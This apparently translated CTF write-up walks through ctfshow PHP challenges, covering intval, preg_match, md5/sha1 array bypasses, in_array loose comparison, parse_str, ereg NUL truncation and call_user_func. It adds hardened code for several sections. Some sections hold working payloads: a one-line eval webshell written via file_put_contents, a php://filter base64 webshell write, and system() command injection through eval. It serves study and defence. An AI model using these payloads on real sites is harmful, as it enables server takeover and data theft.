Summary of PHP test sites encountered in CTF questions (I)
2022-06-30 02:56:00 【It old culvert】

## Introduction
This article summarizes the PHP test points I ran into while working through the ctfshow challenges. Summarizing knowledge points and test points on their own is abstract and hard to follow, so I summarize them through the challenges themselves, which is easier to understand.
## PHP function properties
## One
Test point 1: intval() returns 1 when it is passed a non-empty array. See the PHP manual for details: https://www.php.net/manual/zh/function.intval.php
Test point 2: preg_match() can only handle strings; when it is passed an array it returns false. See the PHP manual for details as well.
Example:
```php
<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}
```
Example analysis:
Analyzing the code above: the regular expression matches the digits 0-9, and if it matches the script dies immediately. But because preg_match() can only handle strings and returns false when it is passed an array, an array bypasses the die. Because I did not know much about the intval() function before, I looked it up directly in the PHP manual (https://www.php.net/manual/zh/function.intval.php). It says that intval() gets the integer value of a variable, converting it using the specified base (the default is decimal) and returning the integer value of var. intval() cannot be used on objects; otherwise an E_NOTICE error occurs and 1 is returned. In other words, when intval() is passed a non-empty array it returns 1. Combined with the fact that preg_match() returns false when passed an array, the payload for this question is clear.
payload:
?num[]=1
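As an added example (not code from the original post or from ctfshow), the script below runs the two checks from the challenge against a string and against an array, and beside them a hardened version that rejects any non-string input before preg_match() or intval() sees it. The function names vulnerable_check() and hardened_check() and the sample inputs are my own. One caveat the post does not mention: on PHP 7 preg_match() returns NULL (falsy) with a warning for array input, while on PHP 8 it throws a TypeError, so the example catches that case.

```php
<?php
// Added example: how the challenge's checks behave on a string versus an array,
// and a hardened version that rejects non-string input up front.
// Function names and inputs are assumed for this example, not part of the challenge.

function vulnerable_check($num): string
{
    try {
        // PHP 7: NULL (falsy) with a warning for an array; PHP 8: TypeError.
        if (@preg_match("/[0-9]/", $num)) {
            return "blocked";
        }
    } catch (TypeError $e) {
        return "blocked (TypeError)";
    }
    // intval() of a non-empty array is 1 on both PHP 7 and PHP 8.
    return intval($num) ? "flag" : "blocked";
}

function hardened_check($num): string
{
    // Reject arrays, objects and nulls before any string function sees them.
    if (!is_string($num)) {
        return "blocked (not a string)";
    }
    if (preg_match("/[0-9]/", $num)) {
        return "blocked";
    }
    return intval($num) ? "flag" : "blocked";
}

// Constructed inputs: what ?num=1, ?num=abc and ?num[]=1 arrive as in $_GET.
$inputs = ["1", "abc", ["1"]];
foreach ($inputs as $in) {
    printf("%-8s vulnerable=%-24s hardened=%s\n",
        json_encode($in), vulnerable_check($in), hardened_check($in));
}
// "1"   -> blocked / blocked            (digit matched)
// "abc" -> blocked / blocked            (intval("abc") is 0)
// ["1"] -> flag on PHP 7, blocked (TypeError) on PHP 8 / blocked (not a string)
```

The hardened check does not rely on either function's array behaviour at all: the type test comes first, so the result is the same on PHP 7 and PHP 8.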
## Two
Test point 1: when the PHP comparison operator === is used, it first checks whether the types of the two values are equal, and only then whether the values are equal.
Test point 2: intval($value, $base) with $base set to 0 detects the base to use from the format of $value.
Example:
```php
<?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){ # === first checks whether the types of the two values are equal, then whether the values are equal
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}
```
Example analysis:
As shown in the figure below, by checking the PHP manual we find that intval($value, $base) with $base set to 0 detects the base from the format of $value. So we can convert 4476 to hexadecimal; after intval() with base 0 processes it, it recognises the hexadecimal value as 4476 and returns the flag. At the same time, because === first checks whether the types of the two values are equal and only then compares the values, the two strings are not identical, the comparison returns false, and the die is bypassed.

payload:
?num=0x117c
## Three
Test point 1: strpos() finds the position of the first occurrence of a string inside another string and returns it.
Test point 2: intval($value, $base) with $base set to 0 detects the base to use from the format of $value.
Example:
```php
<?php
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){ # strpos() finds the position of the first occurrence of a string inside another string and returns it.
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}
```
Example analysis:
If we try to bypass with 4476 in octal, there is a problem: an octal number must start with 0, so strpos() finds the digit 0 at position 0 and returns 0, and !0 is true, which executes the die. So we can put a space before the octal number; strpos() then returns 1. We therefore convert 4476 to octal, 10574, and add a space in front of it.
The payload is as follows:
?num= 010574
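As an added example covering sections Two and Three together (it is not code from the original post), the script below feeds the literal value, the hexadecimal form and the space-prefixed octal form through intval() with base 0, shows what strpos() returns for each, and beside that a canonical parser that accepts exactly one spelling of a number. The function names parse_base0() and parse_canonical() and the inputs are my own.

```php
<?php
// Added example: intval() with base 0 accepts several notations for one value;
// a canonical parser accepts only plain decimal digits.
// Function names and inputs are assumed for this example, not part of the challenge.

// intval($s, 0) follows the C strtol() rules: leading whitespace is skipped,
// a "0x" prefix selects hexadecimal, a leading "0" selects octal, otherwise decimal.
function parse_base0(string $s): int
{
    return intval($s, 0);
}

// Canonical decimal only: no sign, no whitespace, no prefix, no leading zeros.
// Returns null when the input is not in that form.
function parse_canonical(string $s): ?int
{
    if (!preg_match('/^(0|[1-9][0-9]*)$/', $s)) {
        return null;
    }
    return (int) $s;
}

// Constructed inputs: the literal value, the hexadecimal form from section Two,
// the space-prefixed octal form from section Three, and plain 10574 for contrast.
$inputs = ["4476", "0x117c", " 010574", "10574"];
foreach ($inputs as $s) {
    printf("%-10s intval(,0)=%-6d canonical=%-5s strpos(,\"0\")=%s\n",
        json_encode($s),
        parse_base0($s),
        var_export(parse_canonical($s), true),
        var_export(strpos($s, "0"), true));
}
// "4476"    -> 4476   canonical 4476  strpos false
// "0x117c"  -> 4476   canonical NULL  strpos 0
// " 010574" -> 4476   canonical NULL  strpos 1
// "10574"   -> 10574  canonical 10574 strpos 1
```

Comparing the canonical value with an integer (parse_canonical($num) === 4476) gives one representation per number, so a deny-list on one spelling such as "4476" is never the control; the parser is.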
## Four
Test point 1: when the PHP comparison operator === is used, it first checks whether the types of the two values are equal, and only then whether the values are equal.
Test point 2: in PHP, a strong comparison where the variables a and b must hold different values but are required to have the same md5 value, and the method of bypassing it.
Test point 3: in PHP, md5() returns false when it is passed an array.
Example:
```php
<?php
if (isset($_POST['a']) and isset($_POST['b'])) {
    if ($_POST['a'] != $_POST['b'])
        if (md5($_POST['a']) === md5($_POST['b']))
            echo $flag;
        else
            print 'Wrong.';
}
```
Example analysis:
This question is the strong-comparison md5 type. From the code we know that a and b must have different values but the same md5 value. For the strong comparison we can use the fact that md5() returns false when it is given an array, so false === false bypasses the check. I previously wrote an article summarizing the relevant knowledge points; the link is: https://www.freebuf.com/articles/web/321300.html
payload:
a[]=1&b[]=2
## Five
Test point 1: in_array() checks whether a value exists in an array, and when the third parameter is not set the comparison is a loose one.
Test point 2: file_put_contents() writes a string to a file. If both the string written and the file name are controllable, this can lead to an arbitrary file upload vulnerability.
Example:
```php
<?php
$allow = array(); # create an empty array
for ($i=36; $i < 0x36d; $i++) {
    array_push($allow, rand(1,$i)); # generate a random integer between 1 and $i and append it to the end of $allow
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}
```
Example analysis:
Because I did not know much about the in_array() function before, I looked it up directly in the PHP manual: https://www.php.net/manual/zh/function.in-array.php. I found that this question calls in_array() without setting the third parameter to TRUE, so in_array() uses the == loose comparison: the values are first cast to the same type and then compared for equality. So when we pass in 1.php, it is cast to the number 1, and the number 1 happens to be in the range(1,24) array, so when the randomly generated number is 1 the in_array() check is bypassed, causing an arbitrary file upload vulnerability. Try a few more times until no error is reported, which indicates that the one-line shell has been written. Then visit 1.php and POST 1=system('ls'); to view the directory, then visit flag36d.php, namely POST 1=system('cat flag36d.php'); and the flag can be seen in the page source.
payload:
?n=1.php
post: content=<?php eval($_POST[1]);?> # write the one-line shell
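As an added example (not code from the original post), the script below shows the loose in_array() match that lets the string "1.php" equal the integer 1, the strict form that does not, and a hardened write routine that fixes the directory, strips path components and checks the name against an allowlist before file_put_contents() runs. The function names loose_match(), strict_match() and safe_write(), the allowlist and the extension pattern are my own. A caveat the post does not mention: PHP 8 changed int-to-string comparison, so the loose match that works on PHP 7 is already false on PHP 8.

```php
<?php
// Added example: loose versus strict in_array(), and a hardened file write.
// Function names, the allowlist and the extension pattern are assumed for this example.

function loose_match(string $name, array $allow): bool
{
    return in_array($name, $allow);        // == comparison
}

function strict_match(string $name, array $allow): bool
{
    return in_array($name, $allow, true);  // === comparison: a string never equals an int
}

// Hardened write: fixed directory, basename() drops any directory or wrapper prefix,
// the name must match a conservative pattern and be in the allowlist strictly.
function safe_write(string $name, string $content, array $allow, string $dir): bool
{
    $base = basename($name);
    if (!preg_match('/^[A-Za-z0-9_-]+\.(txt|log)$/', $base)) {
        return false;
    }
    if (!in_array($base, $allow, true)) {
        return false;
    }
    return file_put_contents($dir . DIRECTORY_SEPARATOR . $base, $content) !== false;
}

// Constructed allowlist of integers, as the challenge's rand() loop produces.
$allow = [1, 7, 42];
$name  = "1.php";
// PHP 7: "1.php" is cast to 1 for ==, so this is true.
// PHP 8: an int compared with a non-numeric string is compared as strings, so it is false.
var_dump(loose_match($name, $allow));
var_dump(strict_match($name, $allow));   // bool(false) on every version

$dir = sys_get_temp_dir();
var_dump(safe_write("../1.php", "x", ["notes.txt"], $dir));       // bool(false): fails the pattern
var_dump(safe_write("php://filter/resource=1.php", "x", ["notes.txt"], $dir)); // bool(false)
var_dump(safe_write("notes.txt", "hello", ["notes.txt"], $dir));  // bool(true): written under $dir
```

The strict flag alone only fixes the comparison; the file name still has to be validated separately, which is what safe_write() does.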
## Six
Test point 1: is_numeric() checks whether a variable is a number or a numeric string. It returns TRUE if the variable is a number or a numeric string, otherwise FALSE.
Test point 2: PHP operators have precedence, and && > = > and.
Example:
```php
<?php
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\;/", $v2)){
        if(preg_match("/\;/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
}
```
Example analysis:
is_numeric() checks whether a variable is a number or a numeric string; it returns TRUE if the variable is a number or a numeric string, otherwise FALSE. Looking at the final eval, a command must be executed there, so $v2 has to carry the command and $v3 has to end with ;. But once is_numeric() has processed them the assignment becomes
```php
$v0 = $v1 and FALSE and FALSE
```
However, PHP operators have precedence, namely && > = > and.
According to the precedence, = is evaluated first, so $v0 is assigned true and the false values are ignored. With that idea the payload is
?v1=1&v2=system("tac ctfshow.php")&v3=;
or
?v1=1&v2=var_dump($ctfshow)&v3=; #var_dump() outputs information about a variable; here it is used to get the variables in the ctfshow class in order to obtain the flag
We obtain $flag_is_1ce376300x2d8dc70x2d4b870x2d9f0e0x2d1eea5dada15;, in which 0x2d must be replaced with -. But the flag has 35 characters in total and one is still missing; the last one has to be brute-forced.
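As an added example (not code from the original post), the script below puts the two spellings of the check side by side: with `and`, the assignment binds first and only the first is_numeric() result reaches $v0; with `&&`, $v0 holds the conjunction of all three. It also shows a few inputs that is_numeric() accepts, which matters for section Seven as well. The function names check_with_and() and check_with_amp() and the inputs are my own.

```php
<?php
// Added example: "and" binds more loosely than "=", so the challenge's check
// only ever assigns the first is_numeric() result to $v0.
// Function names and inputs are assumed for this example, not part of the challenge.

function check_with_and(string $v1, string $v2, string $v3): bool
{
    // Parsed as ($v0 = is_numeric($v1)) and is_numeric($v2) and is_numeric($v3);
    $v0 = is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
    return $v0;
}

function check_with_amp(string $v1, string $v2, string $v3): bool
{
    // && binds tighter than =, so $v0 is true only if all three are numeric.
    $v0 = is_numeric($v1) && is_numeric($v2) && is_numeric($v3);
    return $v0;
}

// Constructed inputs mirroring the challenge's query string: only $v1 is numeric.
$v1 = "1";
$v2 = "abc";   // constructed non-numeric value
$v3 = ";";

var_dump(check_with_and($v1, $v2, $v3)); // bool(true): $v2 and $v3 were never required
var_dump(check_with_amp($v1, $v2, $v3)); // bool(false)

// is_numeric() is a "looks like a number" test, not a format check:
var_dump(is_numeric("1e3"));   // bool(true): scientific notation
var_dump(is_numeric(" 12"));   // bool(true): leading whitespace is allowed
var_dump(is_numeric("12 "));   // PHP 8: bool(true); PHP 7: bool(false)
var_dump(is_numeric("0x1A"));  // bool(false) since PHP 7: hex strings are not numeric
var_dump(is_numeric("504438395948526859794171594473")); // bool(true): a 30-digit string is still numeric
```

Parenthesising the assignment, or simply using &&, removes the precedence trap; the second part shows why "numeric" on its own is not a useful allowlist for content that is later written to disk.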
## Seven
Test point 1: is_numeric() checks whether a variable is a number or a numeric string; it returns true if the variable is a number or a numeric string, otherwise false. A string containing an e, meaning scientific notation, also returns true.
Test point 2: call_user_func() is used to call a function or method: the first parameter is the function being called, the second holds the parameters of the called function.
Test point 3: file_put_contents() writes a string to a file. If both the string written and the file name are controllable, this can lead to an arbitrary file upload vulnerability.
Test point 4: file_put_contents() combined with the php:// protocol can write a webshell in base64-encoded form.
Example:
```php
<?php
highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3); # analysis: the command carried in $v2 is base64-encoded and converted to a hexadecimal string so that $v4 becomes true
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s); # analysis: $v1 names hex2bin, which converts the hexadecimal string in $v2 back to its original base64 form
    echo $str;
    file_put_contents($v3,$str); # analysis: the php://filter pseudo-protocol is used to write the webshell
}
else{
    die('hacker');
}
```
Example analysis:
First, v2 and v3 are GET parameters and v1 is a POST parameter. The if needs $v4 to be true to continue, and for $v4 to be true the parameter passed in $v2 must be a number or a numeric string. At the same time $v2 is the webshell we want to write. To make $v2 a number or numeric string, we can base64-encode the webshell and then convert the base64 to hexadecimal, which is one way of turning it into digits. The local test code is as follows:
```php
# local test code
<?php
$b = base64_encode('<?=`tac *`;');
$b = str_replace("=","",$b);
echo "after base64 encoding: ".$b."\n";
$a = call_user_func('bin2hex',$b); # bin2hex converts the base64 form into a hexadecimal string
echo "hexadecimal form: ".$a."\n";
var_dump(is_numeric($a));
/* output
after base64 encoding: PD89YHRhYyAqYDs
hexadecimal form: 504438395948526859794171594473
bool(true)
*/
?>
```
Explanation: <?= is the PHP short tag, a shorthand for echo(). One more point: substr() takes the string starting at index 2 (string indexes start at 0), so we need to prepend the two digits 00.
Therefore the payload is
?v2=00504438395948526859794171594473&v3=php://filter/write=convert.base64-decode/resource=1.php
post:
v1=hex2bin # hex2bin converts the hexadecimal string back into its original base64 form
## Eight
Test point: the properties of sha1(). The sha1() function cannot process arrays; if it is given an array it returns NULL.
Example:
```php
<?php
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2)){
        echo $flag;
    }
}
```
**Example analysis:** sha1() cannot process arrays and returns NULL when it is given one, so set both variables to array type to get the flag.
The payload is as follows:
?v2[]= # whether these two values are assigned or not makes no difference
post:
v1[]=
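As an added example covering sections Four and Eight together (not code from the original post), the script below shows what md5() and sha1() return for array input on PHP 7 versus PHP 8, and beside that a comparison routine that only hashes strings and compares the digests with hash_equals(). The function names hash_of() and same_digest() and the inputs are my own.

```php
<?php
// Added example: array input to md5()/sha1(), and a type-safe digest comparison.
// Function names and inputs are assumed for this example, not part of the challenge.

function hash_of($value, string $algo): string
{
    try {
        // PHP 7: NULL with a warning for an array (so NULL == NULL and NULL === NULL
        // both hold between two such results). PHP 8: TypeError.
        $h = @$algo($value);
        return var_export($h, true);
    } catch (TypeError $e) {
        return "TypeError";
    }
}

// Hardened comparison: both sides must be strings, and the digests are compared
// with hash_equals(), which is constant-time and never treats two non-strings as equal.
function same_digest($a, $b, string $algo = "md5"): bool
{
    if (!is_string($a) || !is_string($b)) {
        return false;
    }
    return hash_equals(hash($algo, $a), hash($algo, $b));
}

// Constructed inputs: two distinct arrays, as a[]=1&b[]=2 would arrive in $_POST.
$a = ["1"];
$b = ["2"];
echo "md5(a)  = ", hash_of($a, "md5"), "\n";   // NULL on PHP 7, TypeError on PHP 8
echo "sha1(b) = ", hash_of($b, "sha1"), "\n";  // NULL on PHP 7, TypeError on PHP 8

var_dump(same_digest($a, $b));          // bool(false): arrays never pass the type test
var_dump(same_digest("abc", "abc"));    // bool(true)
var_dump(same_digest("abc", "abd"));    // bool(false)
var_dump(same_digest("abc", "abc", "sha1")); // bool(true)
```

The type test is what removes the bypass: once both operands are known to be strings, the digests are real digests and === or hash_equals() compare two hex strings rather than two NULLs.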
## Nine
Test point 1: parse_str() sets the variables named in its first parameter. If the second parameter is given, the variables from the first parameter are stored in that array as array elements instead.
Example:
```php
<?php
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
if(isset($_POST['v1'])){
    $v1 = $_POST['v1'];
    $v3 = $_GET['v3'];
    parse_str($v1,$v2);
    if($v2['flag']==md5($v3)){
        echo $flag;
    }
}
```
Example analysis:
After reading the code above you should see that the key to this question is the parse_str() function, so I checked the PHP manual's introduction to parse_str() directly; the link is https://www.php.net/parse_str/. It tells us that the function sets the variables named in the first parameter, and if the second parameter is given, the variables from the first parameter are stored in that array as array elements. Analyzing the code, we know that v1 is under our control and that the v2 array has the key flag, so through parse_str() we can write the variable name and value from v1 into the array v2 and thereby overwrite the flag key. v3 is also under our control, so we can satisfy the check $v2['flag']==md5($v3) and have the flag printed. With that idea we can build the payload, which is as follows:
?v3=1
POST:v1=flag=c4ca4238a0b923820dcc509a6f75849b #the md5 of 1
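As an added example (not code from the original post), the script below shows exactly what parse_str() writes into its result array for a few query strings, reproduces the challenge's check to make clear that both sides of the comparison come from the request, and shows a hardened form in which the reference digest lives on the server. The function names parsed(), challenge_check() and hardened_check() and the inputs are my own.

```php
<?php
// Added example: what parse_str() produces, and why a comparison whose both
// sides come from the request proves nothing.
// Function names and inputs are assumed for this example, not part of the challenge.

function parsed(string $query): array
{
    parse_str($query, $out);   // with a second argument the keys land in $out, not in variables
    return $out;
}

// Constructed inputs
var_export(parsed("flag=c4ca4238a0b923820dcc509a6f75849b")); echo "\n";
// array ( 'flag' => 'c4ca4238a0b923820dcc509a6f75849b', )
var_export(parsed("flag[]=1&flag[]=2&other=x")); echo "\n";
// array ( 'flag' => array ( 0 => '1', 1 => '2', ), 'other' => 'x', )
var_export(parsed("a.b=1&c%20d=2")); echo "\n";
// dots and spaces in key names become underscores: array ( 'a_b' => '1', 'c_d' => '2', )

// The challenge's check: $v2['flag'] (from $v1) and $v3 are both client-controlled.
function challenge_check(string $v1, string $v3): bool
{
    parse_str($v1, $v2);
    return isset($v2['flag']) && $v2['flag'] == md5($v3);
}
var_dump(challenge_check("flag=c4ca4238a0b923820dcc509a6f75849b", "1")); // bool(true): md5("1")

// Hardened: the reference digest is held by the server, the request supplies only $v3,
// and the comparison is constant-time and string-typed.
function hardened_check(string $v3, string $reference_md5): bool
{
    return hash_equals($reference_md5, md5($v3));
}
$reference = md5("server-side-secret");   // constructed placeholder for a server-held value
var_dump(hardened_check("1", $reference));                  // bool(false)
var_dump(hardened_check("server-side-secret", $reference)); // bool(true)
```

Note also that parse_str() without a second argument (removed in PHP 8) used to create real variables from the query string, which is the same overwrite problem applied to the whole local scope.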
## Ten
Test point: matching with the ereg() function can be truncated by %00.
Example:
```php
<?php
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE) {
    die('error');
}
// only 36d people can see the flag
if(intval(strrev($_GET['c']))==0x36d){
    echo $flag;
}
```
Example analysis:
**ereg()** searches a string for the pattern given by the second string and returns true if the pattern is found, otherwise false. The search is case sensitive for alphabetic characters.
**strrev()** reverses a string. **intval()** gets the integer value of a variable. First we need to know that %00 truncates the search done by ereg(): the regular expression only matches the content before the %00. The decimal value of 0x36d is 877. We need letters at the front to satisfy the regular match in the if condition and skip the die; the string is then reversed to give 877a, and intval() takes the integer part to give 877.
Therefore the payload is
?c=a%00778
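As an added example (not code from the original post), the script below runs the challenge's input through preg_match(), which is binary-safe and so does not have the NUL truncation that ereg() had (ereg() was removed in PHP 7), and then through strrev() and intval() to show where 877 comes from. It also shows the trailing-newline caveat of the $ anchor and the D modifier that closes it. The function names letters_only() and reversed_int() are my own.

```php
<?php
// Added example: NUL bytes in a regex subject, the strrev()/intval() pipeline,
// and the $ anchor versus the D modifier.
// Function names and inputs are assumed for this example, not part of the challenge.

function letters_only(string $c): bool
{
    // preg_match() is binary-safe: the \0 is part of the subject and fails [a-zA-Z]+.
    // The D modifier makes $ match only at the very end, not before a trailing "\n".
    return preg_match('/^[a-zA-Z]+$/D', $c) === 1;
}

function reversed_int(string $c): int
{
    // strrev() is byte-wise; intval() reads leading digits and stops at the first non-digit.
    return intval(strrev($c));
}

// Constructed input: the challenge's ?c=a%00778 as PHP receives it ("\0" is a NUL byte).
$c = "a\0" . "778";
var_dump(letters_only($c));          // bool(false): the whole string is checked, NUL included
var_dump(bin2hex(strrev($c)));       // "3837370061": "877", NUL, "a"
var_dump(reversed_int($c));          // int(877)
var_dump(reversed_int($c) == 0x36d); // bool(true): 0x36d is 877

// A trailing newline slips past a bare $ but not past $ with the D modifier.
var_dump(preg_match('/^[a-z]+$/', "abc\n") === 1);   // bool(true)
var_dump(preg_match('/^[a-z]+$/D', "abc\n") === 1);  // bool(false)
```

The two points reinforce each other: a validator has to see every byte of the value, and its anchors have to mean the true start and end of that value.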
## Eleven
Test point 1: call_user_func() executes a callback function. It takes its first parameter as the callback, and the remaining parameters are passed as the callback's parameters.
Test point 2: _() is a function: _() is equivalent to gettext(); it is the gettext extension's function.
Test point 3: get_defined_vars() returns an array of all defined variables.
Example:
```php
<?php
error_reporting(0);
include("flag.php");
highlight_file(__FILE__);
$f1 = $_GET['f1'];
$f2 = $_GET['f2'];
if(check($f1)){
    var_dump(call_user_func(call_user_func($f1,$f2)));
}else{
    echo " Uh huh ?";
}
function check($str){
    return !preg_match('/[0-9]|[a-z]/i', $str);
}
```
Example analysis:
**call_user_func()** takes its first parameter as a callback function, and the remaining parameters are passed as the callback's parameters.
_() is a function: _() is equivalent to gettext(); it is the gettext extension's function. Enabling the gettext extension requires php_gettext.dll in the PHP extension directory.
Test code:
```php
<?php
echo gettext("ctfshownb");
// output: ctfshownb
echo _("ctfshownb");
// output: ctfshownb
```
get_defined_vars() returns an array of all defined variables, which is how we can obtain $flag.
The whole execution process is
```php
var_dump(call_user_func(call_user_func($f1,$f2)));
var_dump(call_user_func(call_user_func('_','get_defined_vars')));
var_dump(call_user_func('get_defined_vars')); // outputs the array
```
**payload:**
?f1=_&f2=get_defined_vars
## Twelve
Test point: the properties of call_user_func().
Example 1:
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
class ctfshow
{
    function __wakeup(){
        die("private class");
    }
    static function getFlag(){
        echo file_get_contents("flag.php");
    }
}
call_user_func($_POST['ctfshow']);
```
Example analysis:
Calling the getFlag method of the ctfshow class directly is enough; the payload is
post:
ctfshow=ctfshow::getFlag
**Supplement:** the introduction to call_user_func() in the PHP manual:
https://www.php.net/manual/zh/function.call-user-func.php
Example 2:
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
class ctfshow
{
    function __wakeup(){
        die("private class");
    }
    static function getFlag(){
        echo file_get_contents("flag.php");
    }
}
if(strripos($_POST['ctfshow'], ":")>-1){
    die("private function");
}
call_user_func($_POST['ctfshow']);
```
Example analysis:
On top of the previous question the colon is banned, but call_user_func() also accepts a callable in array form:
```php
call_user_func(array('ctfshow', 'getFlag'));
```
This calls the getFlag method of ctfshow.
Therefore the payload is
post:
ctfshow[0]=ctfshow&ctfshow[1]=getFlag
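As an added example covering sections Eleven and Twelve together (not code from the original post), the script below shows that the string form "Class::method" and the array form ['Class', 'method'] resolve to the same static call through call_user_func(), so filtering one spelling is not a control, and beside that a dispatcher that maps an opaque action name onto a server-side allowlist so that the client never supplies a callable at all. The class Demo, the functions describe_callable() and dispatch(), and the ACTIONS table are my own.

```php
<?php
// Added example: two spellings of one callable, and an allowlist dispatcher.
// The class, function names and ACTIONS table are assumed for this example.

class Demo
{
    public static function hello(): string { return "hello"; }
    public static function internal(): string { return "should never be reachable from a request"; }
}

// Resolve a client-supplied callable the way call_user_func() would, and report it.
function describe_callable($cb): string
{
    // The third argument receives the normalised callable name.
    if (!is_callable($cb, false, $name)) {
        return "not callable";
    }
    return $name . " -> " . call_user_func($cb);
}

// Both spellings reach the same method when the callable comes from the client.
echo describe_callable("Demo::internal"), "\n";      // Demo::internal -> should never be reachable from a request
echo describe_callable(["Demo", "internal"]), "\n";  // Demo::internal -> should never be reachable from a request
echo describe_callable("no_such_function"), "\n";    // not callable

// Hardened: the request carries an opaque action name; the server owns the mapping
// from that name to a callable, and nothing outside the table can be reached.
const ACTIONS = [
    'hello' => ['Demo', 'hello'],
];

function dispatch($action): string
{
    if (!is_string($action) || !array_key_exists($action, ACTIONS)) {
        return "rejected";
    }
    return call_user_func(ACTIONS[$action]);
}

var_dump(dispatch("hello"));               // string(5) "hello"
var_dump(dispatch("Demo::internal"));      // string(8) "rejected"
var_dump(dispatch(["Demo", "internal"]));  // string(8) "rejected": arrays are not even looked up
var_dump(dispatch("Demo::hello"));         // string(8) "rejected": only table keys are accepted
```

The same pattern applies to the nested call_user_func(call_user_func($f1, $f2)) in section Eleven: as long as $f1 and $f2 are free-form strings, any deny-list on their characters is one encoding away from being bypassed, whereas a table lookup has no second spelling.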